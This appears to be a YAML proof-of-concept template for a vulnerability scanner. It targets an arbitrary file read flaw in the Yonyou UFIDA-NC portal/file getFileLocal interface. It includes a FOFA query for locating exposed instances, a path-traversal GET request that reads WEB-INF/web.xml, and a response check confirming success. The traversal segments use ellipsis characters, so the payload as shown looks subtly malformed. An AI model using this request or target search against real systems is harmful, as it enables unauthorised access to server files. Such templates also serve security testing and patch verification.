product: 用友UFIDA-NC
vName: 用友UFIDA-NC getFileLocal接口任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友UFIDA-NC portal/file接口存在任意文件读取漏洞。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && title=="产品登录界面"
protocol: http
link: https://cn-sec.com/archives/2255232.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/file?cmd=getFileLocal&fileid=…%2F…%2F…%2F…%2Fwebapps/nc_web/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - filter-name
            logic: and